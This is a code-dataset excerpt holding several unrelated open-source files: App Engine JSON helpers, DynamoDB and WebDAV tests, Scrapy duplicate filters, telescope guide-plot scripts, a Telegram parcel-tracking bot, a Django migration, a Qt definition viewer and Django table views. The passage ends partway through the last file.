repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
yusufnb/umlsequence | tailbone/__init__.py | 1 | 5640 | # Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cgi
import functools
import json
import logging
import os
import re
import string
import time
import webapp2
from google.appengine import api
from google.appengine.ext import ndb
from google.appengine.ext import testbed
PREFIX = "/api/"
NAMESPACE = os.environ.get("NAMESPACE", "")
DEBUG = os.environ.get("SERVER_SOFTWARE", "").startswith("Dev")
# Custom Exceptions
class AppError(Exception):
pass
class BreakError(Exception):
pass
class LoginError(Exception):
pass
# Extensions to the jsonifying of python results
def json_extras(obj):
"""Extended json processing of types."""
if hasattr(obj, "get_result"): # RPC
return obj.get_result()
if hasattr(obj, "strftime"): # datetime
return obj.strftime("%Y-%m-%dT%H:%M:%S.") + str(obj.microsecond / 1000) + "Z"
if isinstance(obj, ndb.GeoPt):
return {"lat": obj.lat, "lon": obj.lon}
return None
# Decorator to return the result of a function as json. It supports jsonp by default.
def as_json(func):
"""Returns json when callback in url"""
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
self.response.headers["Content-Type"] = "application/json"
if DEBUG:
self.response.headers["Access-Control-Allow-Origin"] = "*"
self.response.headers["Access-Control-Allow-Methods"] = "POST,GET,PUT,PATCH,HEAD,OPTIONS"
self.response.headers["Access-Control-Allow-Headers"] = "Content-Type"
else:
api.namespace_manager.set_namespace(NAMESPACE)
try:
resp = func(self, *args, **kwargs)
if resp == None:
resp = {}
except BreakError as e:
return
except LoginError as e:
self.response.set_status(401)
url = api.users.create_login_url(self.request.url)
resp = {
"error": e.__class__.__name__,
"message": e.message,
"url": url
}
if api.app_identity.get_application_id() != testbed.DEFAULT_APP_ID:
logging.error(str(e))
except (AppError, api.datastore_errors.BadArgumentError,
api.datastore_errors.BadRequestError) as e:
self.response.set_status(400)
resp = { "error": e.__class__.__name__, "message": e.message }
if api.app_identity.get_application_id() != testbed.DEFAULT_APP_ID:
logging.error(str(e))
if not isinstance(resp, str) and not isinstance(resp, unicode):
resp = json.dumps(resp, default=json_extras)
# # UNCOMMENT TO ENABLE JSONP
# callback = self.request.get("callback")
# if callback:
# self.response.headers["Content-Type"] = "text/javascript"
# resp = "%s(%s);" % (_callback, resp)
self.response.out.write(resp)
return wrapper
# BaseHandler for error handling
class BaseHandler(webapp2.RequestHandler):
def handle_exception(self, exception, debug):
# Log the error.
logging.error(exception)
# If the exception is a HTTPException, use its error code.
# Otherwise use a generic 500 error code.
if isinstance(exception, webapp2.HTTPException):
self.response.set_status(exception.code)
else:
self.response.set_status(500)
return {"error": str(exception)}
re_json = re.compile(r"^application/json", re.IGNORECASE)
# Parse the body of an upload based on the type if you are trying to post a cgi.FieldStorage object
# you should instead upload those blob separately via the special /api/files url.
def parse_body(self):
if re_json.match(self.request.content_type):
data = json.loads(self.request.body)
else:
data = {}
for k,v in self.request.POST.items():
if isinstance(v, cgi.FieldStorage):
raise AppError("Files should be uploaded separately as their own form to /api/files/ and \
then their ids should be uploaded and stored with the object.")
if type(v) in [str, unicode]:
try:
v = json.loads(v)
except ValueError:
pass
# TODO(doug): Bug when loading multiple json lists with same key
# TODO(doug): Bug when loading a number that should be a string representation of said number
if data.has_key(k):
current = data[k]
if isinstance(current, list):
current.append(v)
else:
data[k] = [current,v]
else:
data[k] = v
return data or {}
# converting numbers to strings so that the user id is represented more consistently
def convert_num_to_str(num):
s = ""
num = str(num)
i = 0
l = len(num)
letters = string.ascii_letters
while True:
if i == l-1:
s += letters[int(num[i])]
break
if i >= l:
break
x = num[i]
n = int(x+num[i+1])
if n < 52:
s += letters[n]
i += 2
else:
s += letters[int(x)]
i += 1
return s
def convert_str_to_num(s):
num = ""
for x in s:
num += str(string.ascii_letters.index(x))
return num
# Fetch the current user id or None
def current_user(required=False):
u = api.users.get_current_user()
if u:
return convert_num_to_str(u.user_id())
if required:
raise LoginError("User must be logged in.")
return None
| apache-2.0 | -7,691,145,162,515,019,000 | 30.333333 | 99 | 0.661525 | false |
succhiello/hieratic-dynamodb | tests/test_flat.py | 1 | 3792 | from pytest import fixture, raises
from datetime import datetime
from boto3.dynamodb.conditions import Key
from hieratic.collection import CollectionResource
from hieratic.index import SimpleIndex
@fixture
def UsersResource(UserResource, ddb):
@CollectionResource.define(
item_class=UserResource,
primary_index=SimpleIndex(('organization_id', int), ('id', int)),
)
class UsersRes(CollectionResource):
def __init__(self):
CollectionResource.__init__(
self, None,
'users',
'dynamodb',
'HieraticDynamoDBTestUser',
ddb,
)
return UsersRes
class TestFlat(object):
def test_flat(self, user_table, UsersResource, User):
users_resource = UsersResource()
now = datetime.now()
user_resource = users_resource.create(User(organization_id=0, id=0, created_at=now, phone={
'home': '00011112222',
'work': '33344445555',
}))
user = user_resource.data
assert user.organization_id == 0
assert user.id == 0
assert user.created_at == now
assert user.phone == {
'home': '00011112222',
'work': '33344445555',
}
user_resource = users_resource['0_0']
user = user_resource.data
assert user.organization_id == 0
assert user.id == 0
assert user.created_at == now
assert user.phone == {
'home': '00011112222',
'work': '33344445555',
}
user_ressource = users_resource.retrieve(0, 0)
user = user_resource.data
assert user.organization_id == 0
assert user.id == 0
assert user.created_at == now
assert user.phone == {
'home': '00011112222',
'work': '33344445555',
}
user_resource.update(name='updated', phone={'work': '66677778888'})
user = user_resource.data
assert user.name == 'updated'
assert user.phone == {
'home': '00011112222',
'work': '66677778888',
}
raw_user = users_resource.engine.table.get_item(Key={
'organization_id': 0,
'id': 0,
})['Item']
assert raw_user['name'] == 'updated'
assert raw_user['phone'] == {
'home': '00011112222',
'work': '66677778888',
}
user_resource.delete()
user = user_resource.data
assert user is None
with raises(KeyError):
users_resource['0_0']
with CollectionResource.get_context('dynamodb') as context:
users_resource.create(User(organization_id=0, id=1), context)
users_resource.create(User(organization_id=0, id=2), context)
users_resource.create(User(organization_id=0, id=3), context)
assert len(list(users_resource.query(KeyConditionExpression=Key('organization_id').eq(0)))) == 0
user_resources = [u_res for u_res in users_resource.query(KeyConditionExpression=Key('organization_id').eq(0))]
assert [1, 2, 3] == [u_res.data.id for u_res in user_resources]
assert [1, 3] == sorted(
u_res.data.id for u_res in
users_resource.bulk_get(Keys=[{'organization_id': 0, 'id': 1},
{'organization_id': 0, 'id': 3}])
)
with CollectionResource.get_context('dynamodb') as context:
for u_res in user_resources:
u_res.delete(context)
assert len(list(users_resource.query(KeyConditionExpression=Key('organization_id').eq(0)))) == 3
assert len(list(users_resource.query(KeyConditionExpression=Key('organization_id').eq(0)))) == 0 | mit | 2,531,767,255,374,252,000 | 31.698276 | 119 | 0.565137 | false |
qiyeboy/SpiderBook | ch15/15.3.py | 1 | 1487 | #coding:utf-8
from scrapy.dupefilters import RFPDupeFilter
class URLFilter(RFPDupeFilter):
"""根据url过滤"""
def __init__(self, path=None,debug=False):
self.urls_seen = set()
RFPDupeFilter.__init__(self, path)
def request_seen(self, request):
if request.url in self.urls_seen:
return True
else:
self.urls_seen.add(request.url)
'''
from scrapy.dupefilters import RFPDupeFilter
from w3lib.util.url import canonicalize_url
class URLSha1Filter(RFPDupeFilter):
"""根据urlsha1过滤"""
def __init__(self, path=None,debug=False):
self.urls_seen = set()
RFPDupeFilter.__init__(self, path)
def request_seen(self, request):
fp = hashlib.sha1()
fp.update(canonicalize_url(request.url))
url_sha1 = fp.hexdigest()
if url_sha1 in self.urls_seen:
return True
else:
self.urls_seen.add(url_sha1)
'''
'''
class URLBloomFilter(RFPDupeFilter):
"""根据urlhash_bloom过滤"""
def __init__(self, path=None,debug=False):
self.urls_sbf = ScalableBloomFilter(mode=ScalableBloomFilter.SMALL_SET_GROWTH)
RFPDupeFilter.__init__(self, path)
def request_seen(self, request):
fp = hashlib.sha1()
fp.update(canonicalize_url(request.url))
url_sha1 = fp.hexdigest()
if url_sha1 in self.urls_sbf:
return True
else:
self.urls_sbf.add(url_sha1)
''' | mit | 5,596,792,075,468,190,000 | 28.877551 | 86 | 0.611073 | false |
red-hood/calendarserver | txweb2/dav/test/test_options.py | 1 | 2178 | ##
# Copyright (c) 2005-2015 Apple Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# DRI: Wilfredo Sanchez, [email protected]
##
from txweb2.iweb import IResponse
import txweb2.dav.test.util
from txweb2.test.test_server import SimpleRequest
class OPTIONS(txweb2.dav.test.util.TestCase):
"""
OPTIONS request
"""
def test_DAV1(self):
"""
DAV level 1
"""
return self._test_level("1")
def test_DAV2(self):
"""
DAV level 2
"""
return self._test_level("2")
test_DAV2.todo = "DAV level 2 unimplemented"
def test_ACL(self):
"""
DAV ACL
"""
return self._test_level("access-control")
def _test_level(self, level):
def doTest(response):
response = IResponse(response)
dav = response.headers.getHeader("dav")
if not dav:
self.fail("no DAV header: %s" % (response.headers,))
self.assertIn(level, dav, "no DAV level %s header" % (level,))
return response
return self.send(SimpleRequest(self.site, "OPTIONS", "/"), doTest)
| apache-2.0 | 5,452,795,465,631,442,000 | 31.507463 | 80 | 0.671717 | false |
svalenti/FLOYDS_pipeline | site_code/plot_xmlguideinfo.py | 1 | 6671 | #!/opt/epd/bin/python
import pyfits
import os
#import matplotlib
#matplotlib.use('Agg')
import scipy
from numpy import array, where, nan
from xml.dom import minidom
from plot_guideinfo import plot_guideflux, plot_guidepos, plot_xposwtime, plot_yposwtime, plot_fwhmwtime, plot_guidestate
def mk_guideinfo_plots(rootname, utstart, utstop, logname, debug=True):
'''Generate plots from FITS guide images'''
if debug: print 'mk_guide_plots: Got:', rootname, utstart, utstop, logname
(timeimg_list, fileimg_list) = readlogfile(logname)
timeimg = scipy.array(timeimg_list)
fileimg = scipy.array(fileimg_list)
#pull out all lines from the guide file that happened between utstart and utstop
time_cull = timeimg * (timeimg > float(utstart)) * (timeimg < float(utstop))
timeimg_gd = timeimg[where(time_cull != 0)]
fileimg_gd = fileimg[where(time_cull != 0)]
if fileimg_gd.size <= 0:
print 'No guide frames taken during exposure!'
else:
guidecheck = 1
mjd_list = read_mjd_from_guide_fits(fileimg_gd)
mjd_arr = array(mjd_list)
mjd_arr = mjd_arr - (min(mjd_arr)-0.1/60.0/24.0)
mjd_arr_sec = mjd_arr*24.0*60.0*60.0
if debug >2: print mjd_list
guidestate_list = read_guidestate_from_guide_fits(fileimg_gd)
plot_guidestate(mjd_arr_sec,guidestate_list)
guidestateplotname = rootname+'_guidestate.png'
retval = os.system('mv yo.png '+guidestateplotname)
if debug: print "mv from yo.png to",guidestateplotname,"had status",retval
# xmlfiles_gd = [f.replace('.fits', '.fits.inst.guide.xml') for f in fileimg_gd]
xmlfiles_gd = [f.replace('.fits', '.fits.guide.xml').replace('flash/', 'cat/') for f in fileimg_gd]
if debug: print xmlfiles_gd
(totcnts_gd, xcen_gd, ycen_gd, fwhm_gd) = read_stats_from_xml_files(xmlfiles_gd)
plot_guideflux(mjd_arr_sec,totcnts_gd)
guidecountplotname = rootname+'_guidecounts.png'
retval = os.system('mv yo.png '+guidecountplotname)
if debug: print "mv from yo.png to",guidecountplotname,"had status",retval
plot_guidepos(xcen_gd,ycen_gd)
guidexypos_plotname = rootname+'_guidexy.png'
retval = os.system('mv yo_xy.png '+guidexypos_plotname)
if debug: print "mv from yo_xy.png to",guidexypos_plotname,"had status",retval
plot_xposwtime(mjd_arr_sec,xcen_gd)
guidext_plotname = rootname+'_guidext.png'
retval = os.system('mv yo_xt.png '+guidext_plotname)
if debug: print "mv from yo_xt.png to",guidext_plotname,"had status",retval
plot_yposwtime(mjd_arr_sec,ycen_gd)
guideyt_plotname = rootname+'_guideyt.png'
retval = os.system('mv yo_yt.png '+guideyt_plotname)
if debug: print "mv from yo_yt.png to",guideyt_plotname,"had status",retval
plot_fwhmwtime(mjd_arr_sec,fwhm_gd)
guidefwhmt_plotname = rootname+'_guidefwhmt.png'
retval = os.system('mv yo_fwhm.png '+guidefwhmt_plotname)
if debug: print "mv from yo_fwhm.png to",guidefwhmt_plotname,"had status",retval
return
def readlogfile(logfile):
'''Read in the new-style guide log which consists of UTC datetime of guide
frame start (e.g. 20140411050644) and the path and filename of the guide
image.
The HHMMSS part of the datetime and the filenames are returned in 2 lists'''
log_fh = open(logfile, 'r')
timeimg = []
fileimg = []
for line in log_fh.readlines():
chunks = line.split()
if len(chunks) == 2:
timestr = chunks[0]
timestr = timestr[8:]
timeimg.append(float(timestr))
fileimg.append(chunks[1])
log_fh.close()
return [timeimg, fileimg]
def read_mjd_from_guide_fits(fits_images):
'''Loops through the <fits_images> list of FITS guide frames, reading in
the MJD and returning this as a list of floats'''
mjd_list = []
for _fileimg in fits_images:
headlist = pyfits.open(_fileimg)
headnow = headlist[0].header
mjdnow = headnow['MJD-OBS']
try:
mjd_list.append(float(mjdnow))
except NameError:
mjd_list = [float(mjdnow)]
headlist.close()
return mjd_list
def read_guidestate_from_guide_fits(fits_images):
'''Loops through the <fits_images> list of FITS guide frames, reading in
the AGSTATE and returning this as a list of strings'''
guidestate_list = []
for _fileimg in fits_images:
headlist = pyfits.open(_fileimg)
headnow = headlist[0].header
guidestatenow = headnow['AGSTATE']
try:
guidestate_list.append(guidestatenow)
except NameError:
guidestate_list = [guidestatenow]
headlist.close()
return guidestate_list
def read_stats_from_xml_files(xmlfiles):
totcnts_gd = []
xcen_gd = []
ycen_gd = []
fwhm_gd = []
for x in xmlfiles:
(counts, fwhm, x_center, y_center) = read_xml_guide_file(x)
if None not in [counts, fwhm, x_center, y_center]:
totcnts_gd.append(counts)
xcen_gd.append(x_center)
ycen_gd.append(y_center)
fwhm_gd.append(fwhm)
else:
print "No values found for", x
return (totcnts_gd, xcen_gd, ycen_gd, fwhm_gd)
def getXMLvalues(element, tag, debug=False):
'''Extract the value from the searched-for tag in the passed element and
return the value.
Note: the above are semirandom words which probably don't have meaning or
understanding...'''
thing = element.getElementsByTagName(tag)[0]
thing_value = thing.childNodes[0].data
if debug: print thing_value
return thing_value
def read_xml_guide_file(guidefile, debug=False):
guide_doc = minidom.parse(guidefile)
centroids = guide_doc.getElementsByTagName("centroids")
flux_value = nan
fwhm_value = nan
x_pixel = nan
y_pixel = nan
for centroid in centroids:
guidestar = centroid.getElementsByTagName("guideStar")[0]
gs_value = guidestar.childNodes[0]
if debug: print gs_value
if gs_value.data == 'true':
if debug: print "Found guidestar", gs_value.nodeType, gs_value.nodeValue
flux_value = getXMLvalues(centroid, "totalFlux")
fwhm_value = getXMLvalues(centroid, "fwhm")
guidepixel = centroid.getElementsByTagName("pixel")[0]
x_pixel = getXMLvalues(guidepixel, "x")
y_pixel = getXMLvalues(guidepixel, "y")
return (flux_value, fwhm_value, x_pixel, y_pixel)
| mit | 424,357,099,756,460,800 | 34.484043 | 121 | 0.637086 | false |
GabrielRF/RastreioBot | async_routine.py | 1 | 5684 | import configparser
import logging.handlers
import sys
from datetime import datetime
from time import time, sleep
from utils.misc import check_update
from utils.misc import async_check_update
from utils.misc import check_type
import apis.apicorreios as correios
import apis.apitrackingmore as trackingmore
from rastreio import db as db_ops
import random
import requests
import telebot
import asyncio
import motor.motor_asyncio
from aiogram import Bot, Dispatcher, executor, types
from aiogram.utils import executor
config = configparser.ConfigParser()
config.read('bot.conf')
TOKEN = config['RASTREIOBOT']['TOKEN']
LOG_ALERTS_FILE = config['RASTREIOBOT']['alerts_log']
PATREON = config['RASTREIOBOT']['patreon']
INTERVAL = 0.03
logger_info = logging.getLogger('InfoLogger')
handler_info = logging.handlers.TimedRotatingFileHandler(
LOG_ALERTS_FILE, when='midnight', interval=1, backupCount=7, encoding='utf-8'
)
#handler_info = logging.FileHandler(LOG_ALERTS_FILE)
logger_info.setLevel(logging.DEBUG)
logger_info.addHandler(handler_info)
bot = Bot(token=TOKEN)
dp = Dispatcher(bot)
client = motor.motor_asyncio.AsyncIOMotorClient()
db = client.rastreiobot
async def get_package(code):
print(code)
stat = await async_check_update(code)
if stat == 0:
stat = 'Sistema dos Correios fora do ar.'
elif stat == 1:
stat = None
elif stat == 3:
stat = None
else:
cursor = await db.rastreiobot.update_one (
{ "code" : code.upper() },
{
"$set": {
"stat" : stat,
"time" : str(time())
}
})
stat = 10
return stat
def check_system():
try:
URL = ('http://webservice.correios.com.br/')
response = requests.get(URL, timeout=10)
except:
logger_info.info(str(datetime.now()) + '\tCorreios indisponível')
return False
if '200' in str(response):
return True
else:
logger_info.info(str(datetime.now()) + '\tCorreios indisponível')
return False
def is_finished_package(old_state):
old_state = old_state.lower()
finished_states = [
'objeto entregue ao',
'objeto apreendido por órgão de fiscalização',
'objeto devolvido',
'objeto roubado',
'delivered',
'postado',
'ect',
]
for state in finished_states:
if state in old_state:
return True
return False
async def up_package(elem):
code = elem['code']
should_retry_finished_package = random.randint(0,5)
try:
old_state = elem['stat'][len(elem['stat'])-1].lower()
len_old_state = len(elem['stat'])
except:
old_state = ""
len_old_state = 1
if is_finished_package(old_state) and not should_retry_finished_package:
return
stat = await get_package(code)
if stat == 0:
return
cursor2 = await db.rastreiobot.find_one(
{
"code": code
})
try:
len_new_state = len(cursor2['stat'])
except:
len_new_state = 1
if len_old_state == len_new_state:
return
len_diff = len_new_state - len_old_state
for user in elem.get('users', []):
logger_info.info(str(datetime.now()) + ' '
+ str(code) + ' \t' + str(user) + ' \t'
+ str(len_old_state) + '\t'
+ str(len_new_state) + '\t' + str(len_diff))
try:
try:
#pacote chines com codigo br
message = (str(u'\U0001F4EE') + '<b>' + code + '</b> (' + elem['code_br'] + ')\n')
except:
message = (str(u'\U0001F4EE') + '<a href="https://t.me/rastreiobot?start=' + code + '">' + code + '</a>\n')
try:
if code not in elem[user]:
message = message + '<b>' + elem[user] + '</b>\n'
except:
pass
for k in reversed(range(1,len_diff+1)):
message = (
message + '\n'
+ cursor2['stat'][len(cursor2['stat'])-k] + '\n')
if 'objeto entregue' in message.lower() and user not in PATREON:
message = (message + '\n'
+ str(u'\U0001F4B3')
+ ' Me ajude a manter o projeto vivo!\nEnvie /doar e veja as opções '
+ str(u'\U0001F4B5'))
if len_old_state < len_new_state:
await bot.send_message(str(user), message, parse_mode='HTML',
disable_web_page_preview=True)
except Exception as e:
logger_info.info(str(datetime.now())
+ ' EXCEPT: ' + str(user) + ' ' + code + ' ' + str(e))
if 'deactivated' in str(e):
db_ops.remove_user_from_package(code, str(user))
elif 'blocked' in str(e):
db_ops.remove_user_from_package(code, str(user))
elif 'kicked' in str(e):
db_ops.remove_user_from_package(code, str(user))
continue
async def async_main():
cursor1 = db.rastreiobot.find()
start = time()
if check_system():
pass
else:
print("exit")
return
# await bot.send_message(str(-340600919), "oi", parse_mode='HTML',
# disable_web_page_preview=True)
tasks = []
n = 0
async for elem in cursor1:
api_type = check_type(elem['code'])
if api_type is correios:
n += 1
tasks.append(up_package(elem))
await asyncio.gather(*tasks)
if __name__ == '__main__':
executor.start(dp, async_main())
# ida ao banco
# chamada da api
# fala com o usuario
| gpl-3.0 | -1,492,536,038,591,025,700 | 27.238806 | 123 | 0.563073 | false |
sunlightlabs/hanuman | extraction/migrations/0001_initial.py | 1 | 1699 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.contrib.postgres.fields
import uuid
class Migration(migrations.Migration):
dependencies = [
('data_collection', '0004_auto_20150512_2124'),
]
operations = [
migrations.CreateModel(
name='Bio',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.TextField()),
('bio_text', django.contrib.postgres.fields.ArrayField(size=None, base_field=models.TextField(), blank=True)),
('url', models.URLField()),
('position', models.PositiveIntegerField(default=0)),
('automated', models.BooleanField(default=True)),
('firm', models.ForeignKey(to='data_collection.Firm')),
],
),
migrations.CreateModel(
name='FirmTrainingSet',
fields=[
('id', models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True)),
('spider_complete', models.BooleanField(default=False)),
('page_classifier_trained', models.BooleanField(default=False)),
('element_classifier_trained', models.BooleanField(default=False)),
('extraction_complete', models.BooleanField(default=False)),
('firm', models.OneToOneField(to='data_collection.Firm')),
],
),
migrations.AlterUniqueTogether(
name='bio',
unique_together=set([('url', 'position')]),
),
]
| bsd-3-clause | -7,269,391,328,728,008,000 | 38.511628 | 126 | 0.576221 | false |
Ultimaker/Uranium | examples/definition_viewer/main.py | 1 | 2488 | # Copyright (c) 2017 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
import sys
import os.path
import signal
import traceback
from PyQt5.QtCore import QObject, QUrl, pyqtSlot, pyqtProperty, pyqtSignal
from PyQt5.QtQml import QQmlApplicationEngine, qmlRegisterType
from PyQt5.QtWidgets import QApplication
import UM.Resources
import UM.Settings
import DefinitionTreeModel
class DefinitionLoader(QObject):
def __init__(self, parent = None):
super().__init__(parent)
self._metadata = {}
self._definition_id = ""
@pyqtSlot("QUrl", result = str)
def load(self, file_path):
try:
definition = UM.Settings.DefinitionContainer(file_path.fileName())
dirname = os.path.dirname(file_path.toLocalFile())
UM.Resources.Resources.addSearchPath(dirname)
UM.Resources.Resources.addSearchPath(os.path.realpath(os.path.join(dirname, "..")))
with open(file_path.toLocalFile(), encoding = "utf-8") as data:
definition.deserialize(data.read())
self._metadata = dict(definition.metaData)
self.metaDataChanged.emit()
UM.Settings.ContainerRegistry.ContainerRegistry.getInstance().addContainer(definition)
self._definition_id = definition.id
self.loaded.emit()
except Exception as e:
error_text = "An exception occurred loading file {0}:\n".format(file_path)
error_text += str(e)
error_text += traceback.format_exc()
self.error.emit(error_text)
loaded = pyqtSignal()
error = pyqtSignal(str, arguments=["errorText"])
metaDataChanged = pyqtSignal()
@pyqtProperty("QVariantMap", notify=metaDataChanged)
def metaData(self):
return self._metadata
@pyqtProperty(str, notify=loaded)
def definitionId(self):
return self._definition_id
signal.signal(signal.SIGINT, signal.SIG_DFL)
file_name = None
if len(sys.argv) > 1:
file_name = sys.argv[1]
del sys.argv[1]
app = QApplication(sys.argv)
engine = QQmlApplicationEngine()
qmlRegisterType(DefinitionLoader, "Example", 1, 0, "DefinitionLoader")
qmlRegisterType(DefinitionTreeModel.DefinitionTreeModel, "Example", 1, 0, "DefinitionTreeModel")
if file_name:
engine.rootContext().setContextProperty("open_file", QUrl.fromLocalFile(file_name))
engine.load(os.path.join(os.path.dirname(os.path.abspath(__file__)), "main.qml"))
app.exec_()
| lgpl-3.0 | 230,418,118,665,629,400 | 30.897436 | 98 | 0.67926 | false |
vanyh/handkeinzungen-app | browsing/views.py | 1 | 13527 | from django_tables2 import SingleTableView, RequestConfig
from bib.models import *
from words.models import ForeignLemma, GermanLemma
from .filters import *
from .forms import *
from .tables import *
class GenericListView(SingleTableView):
filter_class = None
formhelper_class = None
context_filter_name = 'filter'
paginate_by = 25
template_name = 'browsing/generic_list.html'
def get_queryset(self, **kwargs):
qs = super(GenericListView, self).get_queryset()
self.filter = self.filter_class(self.request.GET, queryset=qs)
self.filter.form.helper = self.formhelper_class()
return self.filter.qs
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
return table
def get_context_data(self, **kwargs):
context = super(GenericListView, self).get_context_data()
# context[self.context_filter_name] = self.filter
context['docstring'] = "{}".format(self.model.__doc__)
try:
context['class_name'] = self.model.get_alternative_classname()
except AttributeError:
if self.model.__name__.endswith('s'):
context['class_name'] = "{}".format(self.model.__name__)
else:
context['class_name'] = "{}s".format(self.model.__name__)
try:
context['create_view_link'] = self.model.get_createview_url()
except AttributeError:
context['create_view_link'] = None
return context
class PlaceListView(GenericListView):
model = Place
table_class = PlaceTable
filter_class = PlaceListFilter
formhelper_class = PlaceFilterFormHelper
init_columns = ['id', 'name', 'part_of']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(PlaceListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class AlternativeNameListView(GenericListView):
model = AlternativeName
table_class = AlternativeNameTable
filter_class = AlternativeNameListFilter
formhelper_class = AlternativeNameFilterFormHelper
init_columns = ['id', 'name', 'part_of']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(AlternativeNameListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class GermanLemmaListView(GenericListView):
model = GermanLemma
table_class = GermanLemmaTable
filter_class = GermanLemmaListFilter
formhelper_class = GermanLemmaFilterFormHelper
init_columns = ['lemma', 'url', 'pos', 'translation']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(GermanLemmaListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class ForeignLemmaListView(GenericListView):
model = ForeignLemma
table_class = ForeignLemmaTable
filter_class = ForeignLemmaListFilter
formhelper_class = ForeignLemmaFilterFormHelper
init_columns = ['lemma', 'language', 'uebersetzung']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(ForeignLemmaListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class PartOfQuoteListView(GenericListView):
model = PartOfQuote
table_class = PartOfQuoteTable
filter_class = PartOfQuoteListFilter
formhelper_class = PartOfQuoteFilterFormHelper
init_columns = ['text', 'part_of', 'source', 'speaker', 'language']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(PartOfQuoteListView, self).get_context_data()
context[self.context_filter_name] = self.filter
togglable_colums = [x for x in self.get_all_cols() if x not in self.init_columns]
context['togglable_colums'] = togglable_colums
return context
def get_table(self, **kwargs):
table = super(GenericListView, self).get_table()
RequestConfig(self.request, paginate={
'page': 1, 'per_page': self.paginate_by}).configure(table)
default_cols = self.init_columns
all_cols = self.get_all_cols()
selected_cols = self.request.GET.getlist("columns") + default_cols
exclude_vals = [x for x in all_cols if x not in selected_cols]
table.exclude = exclude_vals
return table
class QuoteListView(GenericListView):
model = Quote
table_class = QuoteTable
filter_class = QuoteListFilter
formhelper_class = QuoteFilterFormHelper
init_columns = ['text', 'book_source', 'zitatsprache']
def get_all_cols(self):
all_cols = list(self.table_class.base_columns.keys())
return all_cols
def get_context_data(self, **kwargs):
context = super(QuoteListView, self).get_context_data()
context[self.context_filter_name] = self.filter
